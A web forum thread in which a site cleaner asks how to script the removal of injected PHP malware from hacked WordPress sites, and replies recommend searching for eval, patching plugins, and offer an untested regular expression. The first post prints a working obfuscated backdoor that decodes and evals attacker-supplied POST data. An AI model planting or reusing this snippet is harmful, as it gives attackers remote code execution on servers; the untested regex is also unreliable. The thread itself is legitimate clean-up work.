Jump to content

Need help creating a VBSscript.


Lunastone

Recommended Posts

I'm trying to automate the clean-up of hacked websites but unfortunately I have great ideas but not enough knowledge to create the solution that i have written down.
I want to create a script which will search the following code <?php*.*PCT4BA6ODSE*.*?> within all .php files of a folder including sub folders. In this code the symbol *.* can be really anything for example;
File:
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nce63e1'])) {eval($s21(${$s20}['nce63e1']));}?><?php
/**
* @author Tarchini Maurizio
* @copyright 2011
*/
$wp_load = dirname(dirname(__FILE__));
for($i=0; $i<10; $i++)
{
if(file_exists($wp_load . '/wp-load.php'))
{
require_once "$wp_load/wp-load.php";
break;
}
else
{
$wp_load = dirname($wp_load);
}
}
?>
Result after running the script:
<?php
/**
* @author Tarchini Maurizio
* @copyright 2011
*/
$wp_load = dirname(dirname(__FILE__));
for($i=0; $i<10; $i++)
{
if(file_exists($wp_load . '/wp-load.php'))
{
require_once "$wp_load/wp-load.php";
break;
}
else
{
$wp_load = dirname($wp_load);
}
}
?>
Link to comment
Share on other sites

Why do you want to do that in VBScript of all languages?You're going to have a fairly difficult time trying to programmatically identify the correct PHP code to remove. In your example above, you're only going to find and remove that one piece of code. It might be better to search for "eval" instead, since the vast majority of malicious PHP scripts will use it. Instead of trying to automatically remove malicious code, which is difficult to actually determine, you might want your program to just list all of the files that contain eval so that each one can be inspected to see if it's actually malicious and, if so, which code should be removed.

Link to comment
Share on other sites

I know how to determine and find all the malicious code within all the files of a domain however, I get about eight different hacked domains daily so i need something to speed up the process.
Which language do you recommend i use to find the code as explained above? And could you point me into the right direction to identify the start (<?php), content (PCT4BA6ODSE) and end (?>) of the malicious code?
Edited by Lunastone
Link to comment
Share on other sites

I get about eight different hacked domains daily so i need something to speed up the process.

What you really need to do is figure out how they are gaining access to write code into the files and close those holes, rather than patching the symptoms. That's definitely easier said than done though. If you're running Wordpress sites, then the first thing to look at is making sure that Wordpress and all plugins and themes are updated. If those things aren't getting updated regularly then attacks like this are a matter of time. The code you showed above will let an attacker execute any PHP code they want on your server, which is a major problem.

Which language do you recommend i use to find the code as explained above?

I guess it depends on the platform. If you have Windows servers then maybe you can compile a VB application and run that. If it's a Linux server, other options would include Perl or Python or you could even do this with PHP. I'm betting that the vulnerabilities are in PHP scripts, so the PHP code would have the same level of access to edit the various files.

And could you point me into the right direction to identify the start (<?php), content (PCT4BA6ODSE) and end (?>) of the malicious code?

I suppose that regular expressions would be the best way to go. The regular expression pattern might look like this, although I haven't tested it:
/<?php(?:(?!?>).)*(PCT4BA6ODSE)(?:(?!?>).)*?>/
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...